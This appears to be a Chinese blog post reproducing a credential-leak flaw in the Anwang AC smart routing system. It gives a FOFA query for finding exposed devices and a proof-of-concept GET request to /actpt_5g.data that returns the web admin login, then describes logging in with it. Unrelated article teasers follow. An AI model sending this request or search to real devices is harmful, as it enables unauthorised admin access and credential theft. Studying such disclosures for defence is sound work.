安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]

news/2024/6/23 18:37:59

文章目录

  • 安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现

安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

AC 集中管理平台能集中管理控制瘦 AP 设备,对AP 实现了智能化高效控制。AC 中的数据能下发到 AP 设备中,AP 设备中的参数也能同步到 AC 集中管理平台。

安网智能AC管理系统actpt_5g.data存在信息漏洞,攻击者可利用该漏洞获取敏感信息。攻击者可利用该漏洞获取AC智能路由系统WEB登录账号密码,登录AC智能路由系统获取WEB管理员权限,从而造成敏感信息泄露。

0x03 影响版本

安网AC智能路由系统

0x04 漏洞环境

FOFA语法:title=“安网-智能路由系统” || header=“HTTPD_ac 1.0”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /actpt_5g.data HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

3.复现

1.执行poc查询账号密码,得到结果并登录
在这里插入图片描述2.使用显示的用户名以及密码登录系统
在这里插入图片描述


https://www.xjx100.cn/news/3119075.html

相关文章

外汇天眼:外汇市场中的“双向交易”是什么意思?

说到外汇市场,总免不了提到它双向交易的优势,很多新手会对这一点有所疑问,今天我们就帮大家解决这一个疑问。 何谓双向交易? 金融市场上,交易者最常接触到的股票,多属于单向交易。 单向交易的模式便是「先…

性能分析之tcpdump抓包

1. 简单用法 tcpdump -i any port 8382 -s 0 -C 200 -w steem.cap 1.1. 参数说明 -i any 指定抓取的网卡,通常是eth0,示例里any表示抓取所有网卡的包;; port 8382 指定抓取的端口,包括发送端口或接收端口&#xff0c…

四则计算机实现(C++)(堆栈的应用)

算法要求: 输入一个数学表达式(假定表达式输入格式合法),计算表达式结果并输出。数学表达式由单个数字和运算符“”、“-”、“*”、“/”、“(、) ”构成,例如 2 3 * ( 4 5 ) - 6 / 4。变量、输出采用整数,只舍不入。 图解算…

SQL Server对象类型(8)——4.8.约束(Constraint)

4.8. 约束(Constraint) 4.8.1. 约束概念 与Oracle中的一样,SQL Server中,约束是虚的、被定义的数据库对象,其本身并不存储数据,其通过一些内置或用户自定义逻辑来实现对表中数据的检查和限制,以使这些表数据符合某个或某些规则或标准,从而实现数据的规则化、标准化和…

linux socket套接字

文章目录 socket流socket(TCP)数据报socket(UDP) 讨论 socket 所谓套接字,就是对网络中不同主机上的应用程序之间进行双向通信的端点的抽象。一个套接字就是网络上进程通信的一端,套接字提供了应用层进程利…

Hive_last_value()

在SQL中,LAST_VALUE()函数是一个窗口函数,用于返回窗口内的最后一个值。窗口函数允许你在一组行上执行计算,这组行与当前行有某种关系。可以将它们想象为与当前行相关的“窗口”。 LAST_VALUE()函数通常与OVER()子句一起使用,后者…

Node.js 万字教程

0. 基础概念 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境,使用了一个事件驱动、非阻塞式 I/O 模型,让 JavaScript 运行在服务端的开发平台。 官方地址:https://nodejs.org/en 中文地址:https://nodejs.org/zh-cn 代…

基于Django+Tensorflow卷积神经网络鸟类识别系统

欢迎大家点赞、收藏、关注、评论啦 ,由于篇幅有限,只展示了部分核心代码。 文章目录 一项目简介系统概述系统功能核心技术系统架构系统优势 二、功能三、系统四. 总结  总结 一项目简介 介绍一个基于DjangoTensorflow卷积神经网络鸟类识别系统是一个非…